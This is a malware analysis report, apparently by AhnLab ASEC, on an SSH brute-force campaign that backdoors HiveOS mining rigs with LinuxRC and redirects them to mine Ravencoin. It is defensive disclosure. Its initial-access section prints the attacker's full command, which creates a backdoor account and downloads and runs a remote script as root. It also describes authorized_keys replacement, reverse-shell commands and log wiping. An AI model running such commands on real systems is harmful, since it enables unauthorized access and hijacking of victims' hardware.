Analysis of an Attack Against HiveOS for Mining Ravencoin
AhnLab Security intelligence Center (ASEC) is using multiple honeypots to monitor attacks targeting improperly managed Linux servers. Among the prominent honeypots is the SSH service using vulnerable credentials, which is targeted by many DDoS and CoinMiner attackers.
While monitoring numerous external attacks, ASEC recently identified an attack targeting HiveOS. The initial access targeted the improperly managed SSH service, ultimately executing commands to mine new cryptocurrency and additionally installing a LinuxRC backdoor.
1. HiveOS
HiveOS is an operating system dedicated to cryptocurrency mining, used for efficiently managing and monitoring multiple mining rigs. It can be used to automate and optimize cryptocurrency mining tasks.
Like other Linux servers, systems running HiveOS can also become targets of attacks if improperly managed. Especially when using SSH services for remote management, it becomes a target for brute force and dictionary attacks. Attacks targeting HiveOS have been ongoing for several years, with most involving the creation of SSH backdoor accounts. However, a new type of attack has recently been identified.
2. Initial Access
The attacker scanned publicly exposed SSH services and attempted to log in through brute force attacks. After successfully logging in, the following commands were executed to add a “hive” account and set a password generated using salt. Then, it downloads and executes a malicious Bash script named “run” from an external source.
| # sudo useradd -p `openssl passwd -1 -salt ‘salt’ IB223lW2` hive -u 1000 -o -g user -G user; sudo wget hxxp://are.cloudns[.]org:12300/hfs/run -O /tmp/run; sudo dos2unix /tmp/run; sudo chmod 777 /tmp/run; sudo /bin/bash /tmp/run # 2openssl passwd -1 -salt salt IB223lW2 |
3. Bash Script (run)
The initially executed “run” script is responsible for creating a backdoor account and installing additional payloads. First, it changes the passwords for the “hive” and “user” accounts using the following commands. It then overwrites the “authorized_keys” file with a new SSH public key.
Figure 1. Command for creating a backdoor account
While it is possible to use a password when logging into a Linux server using SSH, using an SSH key allows users to log in without entering a password. An SSH key pair (public/private keys) is created for this purpose. The public SSH key must be installed in the Linux server to log in. Once the public key is installed in the Linux server, the generated private key can be used afterward to log in from the client to the server without needing a password. In other words, through the above process, the threat actor would be able to use the private key created alongside the public key to log into the compromised system.
Then, a backdoor malware strain named “autofan” and a configuration file named “autofan.service” used to register it as a service are downloaded and registered to the service. Additionally, it downloads a Bash script malware strain named “nvidia-conf” responsible for mining functions and a configuration file named “overclock.service”, and registers them as a service. Once these processes are completed, it deletes multiple log files.
4. LinuxRC Backdoor
“Autofan” is a LinuxRC backdoor developed by “im_bill”, and its source code is available on GitHub. While it is not a well-known open-source backdoor, it has a history of being used alongside Mirai in a Spring4Shell attack case disclosed by China’s “360 Netlab” in 2022. [1]
Figure 3. GitHub Page of LinuxRC
LinuxRC, a simple form of backdoor, supports file browsing, downloading/uploading, command execution, and reverse shell features. The attacker can perform remote control using SSH on the compromised system, but could also use LinuxRC to easily conduct remote control, including file operations.
| Command | Function |
|---|---|
| CMDSHELL | Run command |
| SHELL2 | Run command (interactive shell) |
| BACKDOOR | Reverse shell for the given address |
| EXPLORER | Browse files and directories |
| DOWNLOAD | Download files |
| UPLOAD | Upload files |
| OFFLINE | Terminate |
Table 1. LinuxRC commands
5. Ravencoin Mining
The downloader Bash script also installed another malicious Bash code named “nvidia-conf” in addition to LinuxRC. “nvidia-conf” is responsible for configuring HiveOS’s miner to GMiner and downloading the attacker’s wallet file as follows. To note, since GMiner is already installed in HiveOS, only the wallet file is replaced. Through this, the infected HiveOS system mines the coin specified by the attacker.
Figure 5. HiveOS’s miner configuration routine
Typically, CoinMiners targeting Linux servers tend to install XMRig to mine Monero. However, the CoinMiner targeting HiveOS identified this time is characterized by mining Ravencoin. Ravencoin is a Bitcoin-based cryptocurrency and blockchain platform specialized in asset transfer and management. By checking the downloaded wallet file “wallet.conf” as follows, it is evident that KawPow is the mining algorithm for Ravencoin, as well as the mining pool address and wallet address set by the attacker.
|
### FLIGHT SHEET “nicehash” ### # Miner gminer … META='{“fs_id”:17495019,”gminer”:{“coin”:”Nicehash-KawPow”}}’ |
6. Conclusion
Recently, cryptojacking attacks targeting improperly managed HiveOS servers have been occurring. HiveOS, as an operating system dedicated to cryptocurrency mining, has become a target due to its SSH server in operation using weak account information for remote management. After the initial access, the attacker manipulated the system to mine Ravencoin and also installed the LinuxRC backdoor.
Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks and update to the latest patch to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers that are accessible from the outside to restrict access from threat actors. Lastly, caution must be practiced, updating V3 to the latest version to block malware infection in advance.
File Detection
– Downloader/BASH.Miner (2024.09.20.02)
– Backdoor/Linux.Shell.23272 (2024.09.20.02)
– Downloader/BASH.Miner.SC204555 (2024.09.20.02)
– Data/BIN.Config (2024.10.06.03)
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
